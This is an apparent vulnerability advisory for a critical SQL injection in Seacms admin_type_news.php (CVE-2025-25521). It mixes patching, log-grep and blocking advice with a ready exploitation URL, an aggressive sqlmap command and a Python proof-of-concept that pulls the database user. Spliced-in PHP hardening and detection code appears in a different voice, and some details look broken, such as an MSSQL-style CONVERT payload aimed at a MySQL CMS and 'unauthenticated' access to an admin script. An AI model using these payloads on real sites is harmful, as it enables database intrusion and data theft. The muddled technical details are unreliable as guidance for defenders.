Seacms, SQL Injection, CVE-2025-25521 (Critical)

Seacms <=13.3 contains an unauthenticated SQL injection vulnerability in `admin_type_news.php` due to improper input sanitization. Attackers can exploit this by injecting malicious SQL queries through crafted HTTP requests, allowing database manipulation, data exfiltration, or remote code execution. The flaw occurs when user-supplied parameters are directly concatenated into SQL statements without proper escaping or prepared statements.

DailyCVE Form

Platform: Seacms
Version: <=13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation:

GET /admin_type_news.php?typeid=1%20AND%201=CONVERT(int,(SELECT%20table_name%20FROM%20information_schema.tables))

Detection:

sqlmap -u "http://target/admin_type_news.php?typeid=1" --risk=3 --level=5

Mitigation:

1. Apply vendor patch immediately.

2. Use prepared statements:

$stmt = $pdo->prepare("SELECT * FROM news WHERE typeid = ?");
$stmt->execute([$typeid]);   // $typeid: the request parameter, validated as an integer first
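The two-line prepared-statement fix above is easier to judge next to the pattern it replaces. The following is an added illustration, not SeaCMS code: the concatenation pattern the advisory describes, then a hardened handler that validates the type of `typeid` and binds it as a parameter. The `news` table, the `typeid` column and the `$pdo` connection are assumptions carried over from the mitigation snippet.

```php
<?php
// Added illustration (not SeaCMS's own code). Table/column names and the
// $pdo connection are assumptions taken from the mitigation snippet above.

// BEFORE (vulnerable): the request parameter is concatenated straight into
// the SQL text, so any quote or operator in it changes the query's structure.
function fetchNewsTypeVulnerable(PDO $pdo, array $get): array
{
    $typeid = $get['typeid'] ?? '';
    $sql = "SELECT * FROM news WHERE typeid = " . $typeid;   // DO NOT DO THIS
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER (hardened): validate the type first, then bind the value as a
// parameter so the database never interprets it as SQL.
function fetchNewsTypeSafe(PDO $pdo, array $get): array
{
    $typeid = filter_var($get['typeid'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($typeid === false) {
        // Reject rather than coerce: an unexpected value is a signal, not data.
        http_response_code(400);
        return [];
    }
    $stmt = $pdo->prepare("SELECT * FROM news WHERE typeid = :typeid");
    $stmt->bindValue(':typeid', $typeid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Where the connection is created: with emulated prepares PDO would still
// build the query text client-side, so let MySQL do the binding.
function connect(string $dsn, string $user, string $pass): PDO
{
    $pdo = new PDO($dsn, $user, $pass);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}
```

Validation and binding are separate controls: binding alone stops the value from being parsed as SQL, while the integer check also rejects junk early and gives you a 400 to alert on.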

Log Analysis:

grep "admin_type_news.php" /var/log/apache2/access.log | grep -Ei "UNION|SELECT|CONVERT"
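The grep above only matches keywords that appear literally in the log, so a request whose query string arrives percent-encoded can slip past it. As an added example (not part of the advisory), the script below reads access-log lines, URL-decodes the query string of requests to `admin_type_news.php`, and reports lines containing SQL keywords. The sample log lines are constructed, the keyword list is an assumption, and the Apache combined log format is assumed.

```php
<?php
// Added example (not from the advisory): keyword detection over Apache
// access-log lines, decoding the query string before matching.

// Assumed keyword list; extend it to match your own detection needs.
const SQLI_KEYWORDS = '/\b(UNION|SELECT|CONVERT|EXTRACTVALUE|UPDATEXML|SLEEP|BENCHMARK)\b/i';

/** Return the log lines (verbatim) whose decoded query looks like SQL injection. */
function findSuspiciousRequests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Apache combined format: the request line is the quoted "METHOD target HTTP/x" field.
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $path = (string) (parse_url($m[1], PHP_URL_PATH) ?? '');
        if (basename($path) !== 'admin_type_news.php') {
            continue;
        }
        $query = (string) (parse_url($m[1], PHP_URL_QUERY) ?? '');
        // Decode twice so a doubly percent-encoded value is still inspected in clear.
        $decoded = rawurldecode(rawurldecode($query));
        if (preg_match(SQLI_KEYWORDS, $decoded)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic). Only the second and third
// target admin_type_news.php with SQL keywords; the last hits another script.
$sample = [
    '10.0.0.5 - - [28/Mar/2025:10:00:01 +0000] "GET /admin_type_news.php?typeid=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Mar/2025:10:00:07 +0000] "GET /admin_type_news.php?typeid=1%20UNION%20SELECT%201 HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Mar/2025:10:00:09 +0000] "GET /admin_type_news.php?typeid=1%20%55NION%20%53ELECT%201 HTTP/1.1" 500 0',
    '10.0.0.7 - - [28/Mar/2025:10:00:11 +0000] "GET /index.php?id=1%20UNION%20SELECT%201 HTTP/1.1" 200 80',
];

// Usage: php detect.php < /var/log/apache2/access.log (reads stdin), or run
// as-is to check the constructed sample.
$input = (PHP_SAPI === 'cli' && !posix_isatty(STDIN))
    ? file('php://stdin', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES)
    : $sample;

foreach (findSuspiciousRequests($input) as $hit) {
    echo $hit, PHP_EOL;
}
```

Keyword matching is noisy and easy to miss with; treat hits as triage leads and pair them with the 400 responses a validated handler produces, and with unexpected 500s from this script.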

WAF Rule:

location ~ admin_type_news\.php {
    deny all;
}

Backup Verification:

mysqldump -u root -p seacms > seacms_backup.sql

Patch Validation:

diff -u admin_type_news.php admin_type_news.php.patched

Exploit PoC:

import requests
payload = "1 AND EXTRACTVALUE(0,CONCAT(0x5c,(SELECT user())))"
requests.get(f"http://victim/admin_type_news.php?typeid={payload}")

Post-Exploit Cleanup:

REVOKE ALL PRIVILEGES ON seacms.* FROM 'webuser'@'%';

Emergency Response:

iptables -A INPUT -p tcp --dport 80 -s attacker_ip -j DROP

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25521
Extra Source Hub:
Undercode
